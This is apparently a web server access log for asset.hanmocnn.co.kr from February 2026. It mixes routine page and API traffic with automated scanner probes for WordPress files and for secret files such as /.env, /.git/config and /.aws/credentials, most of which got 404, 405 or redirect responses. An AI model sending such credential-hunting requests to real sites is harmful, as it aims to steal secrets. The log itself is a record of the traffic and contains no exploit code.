[16/Feb/2026:08:37:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:37 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2020/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2021/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:38 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:39 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 91.224.92.99] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
[16/Feb/2026:08:37:39 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 91.224.92.99] [Length 0] [Gzip -] [Sent-to ] "-" "-"
[16/Feb/2026:09:04:29 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 16.144.17.106] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" "-"
[16/Feb/2026:09:04:39 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 16.144.17.106] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 9; CLT-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36" "-"
[16/Feb/2026:09:57:24 +0000] - - 400 - GET http asset.hanmocnn.co.kr "/" [Client 167.172.221.95] [Length 230] [Gzip -] [Sent-to ] "-" "-"
[16/Feb/2026:10:09:43 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[16/Feb/2026:10:09:43 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:10:09:43 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:10:09:43 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 931] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:10:09:43 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:10:09:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:10:09:43 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:10:09:43 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:10:12:09 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 13814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:12:00:32 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[16/Feb/2026:12:00:32 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:12:00:32 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:12:00:32 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:12:01:07 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 3220] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:12:01:10 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[16/Feb/2026:12:01:10 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:12:01:10 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:12:01:10 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:12:06:42 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 30870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:19:45:29 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr"
[16/Feb/2026:19:45:30 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr"
[16/Feb/2026:20:29:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-"
[16/Feb/2026:20:29:58 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:20:29:58 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 211.234.204.1] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:20:29:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 211.234.204.1] [Length 1165] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:20:29:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 211.234.204.1] [Length 932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:20:29:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 211.234.204.1] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:20:30:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 211.234.204.1] [Length 463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://asset.hanmocnn.co.kr/"
[16/Feb/2026:22:29:27 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.git/HEAD" [Client 14.153.67.121] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" "-"
[16/Feb/2026:22:29:29 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.aws/credentials" [Client 190.87.168.129] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-"
[16/Feb/2026:22:29:31 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/.env" [Client 216.147.127.93] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-"
[17/Feb/2026:00:08:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 45.148.10.238] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-"
[17/Feb/2026:04:14:55 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[17/Feb/2026:04:14:56 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 213.209.159.175] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[17/Feb/2026:04:16:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[17/Feb/2026:04:16:45 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:04:16:45 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:04:16:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1168] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:04:16:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 929] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:04:16:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:04:16:45 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:04:16:45 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:04:17:49 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 5976] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[17/Feb/2026:06:05:59 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:01 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//xmlrpc.php?rsd" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:01 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 45.94.31.224] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//blog/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//web/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wordpress/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:02 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//website/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//news/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:03 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2018/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//2019/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//shop/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp1/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:04 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//test/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//media/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//wp2/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:05 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//site/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//cms/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:06 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "//sito/wp-includes/wlwmanifest.xml" [Client 45.94.31.224] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
[17/Feb/2026:06:06:06 +0000] - - 400 - - https asset.hanmocnn.co.kr "-" [Client 45.94.31.224] [Length 0] [Gzip -] [Sent-to ] "-" "-"
[17/Feb/2026:09:11:03 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr"
[17/Feb/2026:09:11:05 +0000] - 405 405 - POST https asset.hanmocnn.co.kr "/" [Client 85.11.167.25] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr"
[17/Feb/2026:10:47:28 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 211.234.204.1] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-"
